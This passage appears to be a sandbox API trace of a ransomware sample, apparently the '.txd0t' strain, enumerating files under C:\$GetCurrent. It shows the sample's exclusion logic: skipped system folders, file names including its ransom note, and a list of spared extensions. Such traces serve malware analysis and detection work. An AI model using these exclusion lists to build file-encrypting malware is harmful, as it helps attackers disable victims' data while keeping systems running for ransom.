ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x57e869e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.txd0t", cAlternateFileName="PARTNE~1.TXD")) returned 1 [0114.136] StrCmpW (psz1="PartnerSetupCompleteResult.log.txd0t", psz2=".") returned 1 [0114.136] StrCmpW (psz1="PartnerSetupCompleteResult.log.txd0t", psz2="..") returned 1 [0114.136] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\Logs", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs") returned="C:\\$GetCurrent\\Logs" [0114.136] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs", psz2="\\", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\") returned="C:\\$GetCurrent\\Logs\\" [0114.136] StrNCatW (in: psz1="C:\\$GetCurrent\\Logs\\", psz2="PartnerSetupCompleteResult.log.txd0t", cchMax=1064 | out: psz1="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t") returned="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.txd0t" [0114.136] PathFindExtensionW (pszPath="PartnerSetupCompleteResult.log.txd0t") returned=".txd0t" [0114.136] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.136] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x57e869e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.txd0t", cAlternateFileName="PARTNE~1.TXD")) returned 0 [0114.136] FindClose (in: hFindFile=0xec1e70 | out: hFindFile=0xec1e70) returned 1 [0114.136] GetProcessHeap () returned 0xe30000 [0114.136] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.136] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0114.136] StrCmpW (psz1="SafeOS", psz2=".") returned 1 [0114.136] StrCmpW (psz1="SafeOS", psz2="..") returned 1 [0114.136] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0114.136] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0114.136] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="SafeOS", cchMax=1054 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system32\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\local\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\boot\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\perflogs\\") returned 0x0 [0114.136] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\programdata\\") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\drivers\\") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\wsus\\") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="crypt_detect") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="cryptolocker") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="ransomware") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\WINDOWS") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.137] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files") returned 0x0 [0114.137] GetProcessHeap () returned 0xe30000 [0114.137] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0x68410a0 [0114.137] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.137] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\*", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\*") returned="C:\\$GetCurrent\\SafeOS\\*" [0114.137] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1cb0 [0114.137] StrCmpW (psz1=".", psz2=".") returned 0 [0114.137] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.137] StrCmpW (psz1="..", psz2=".") returned 1 [0114.137] StrCmpW (psz1="..", psz2="..") returned 0 [0114.137] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ed2a8a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.137] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.137] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.137] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.137] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0114.137] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\!TXDOT_READ_ME!.txt") returned="C:\\$GetCurrent\\SafeOS\\!TXDOT_READ_ME!.txt" [0114.137] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.137] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.137] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.137] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.137] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.138] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0114.138] StrCmpW (psz1="GetCurrentOOBE.dll", psz2=".") returned 1 [0114.138] StrCmpW (psz1="GetCurrentOOBE.dll", psz2="..") returned 1 [0114.138] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.138] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0114.138] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentOOBE.dll", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" [0114.138] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0114.138] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootsect.bak") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="iconcache.db") returned -1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="thumbs.db") returned -1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransomware ") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransom ") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="debug.txt") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="boot.ini") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="desktop.ini") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="autorun.inf") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntuser.dat") returned -1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntldr") returned -1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntdetect.com") returned -1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootfont.bin") returned 1 [0114.138] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.138] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0114.138] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0114.139] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentRollback.ini.txd0t", cAlternateFileName="GETCUR~1.TXD")) returned 1 [0114.139] StrCmpW (psz1="GetCurrentRollback.ini.txd0t", psz2=".") returned 1 [0114.139] StrCmpW (psz1="GetCurrentRollback.ini.txd0t", psz2="..") returned 1 [0114.139] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.139] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0114.139] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentRollback.ini.txd0t", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t" [0114.139] PathFindExtensionW (pszPath="GetCurrentRollback.ini.txd0t") returned=".txd0t" [0114.139] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.139] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0114.139] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2=".") returned 1 [0114.139] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2="..") returned 1 [0114.139] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.139] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0114.139] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="PartnerSetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" [0114.139] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0114.139] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootsect.bak") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="iconcache.db") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="thumbs.db") returned -1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransomware ") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransom ") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="debug.txt") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="boot.ini") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="desktop.ini") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="autorun.inf") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntuser.dat") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntldr") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntdetect.com") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootfont.bin") returned 1 [0114.139] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.139] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0114.139] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0114.139] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0114.140] StrCmpW (psz1="preoobe.cmd", psz2=".") returned 1 [0114.140] StrCmpW (psz1="preoobe.cmd", psz2="..") returned 1 [0114.140] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.140] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0114.140] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="preoobe.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" [0114.140] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0114.140] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="bootsect.bak") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="iconcache.db") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="thumbs.db") returned -1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2=" ransomware ") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2=" ransom ") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="debug.txt") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="boot.ini") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="desktop.ini") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="autorun.inf") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="ntuser.dat") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="ntldr") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="ntdetect.com") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="bootfont.bin") returned 1 [0114.140] StrCmpIW (psz1="preoobe.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.140] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0114.140] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0114.140] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0114.140] StrCmpW (psz1="SetupComplete.cmd", psz2=".") returned 1 [0114.140] StrCmpW (psz1="SetupComplete.cmd", psz2="..") returned 1 [0114.140] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0114.140] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0114.140] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="SetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" [0114.140] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0114.140] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0114.140] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootsect.bak") returned 1 [0114.140] StrCmpIW (psz1="SetupComplete.cmd", psz2="iconcache.db") returned 1 [0114.140] StrCmpIW (psz1="SetupComplete.cmd", psz2="thumbs.db") returned -1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransomware ") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransom ") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="debug.txt") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="boot.ini") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="desktop.ini") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="autorun.inf") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntuser.dat") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntldr") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntdetect.com") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootfont.bin") returned 1 [0114.141] StrCmpIW (psz1="SetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.141] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0114.141] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0114.141] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0114.141] FindClose (in: hFindFile=0xec1cb0 | out: hFindFile=0xec1cb0) returned 1 [0114.141] GetProcessHeap () returned 0xe30000 [0114.141] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.141] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0114.141] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0114.141] GetProcessHeap () returned 0xe30000 [0114.141] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0114.141] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, 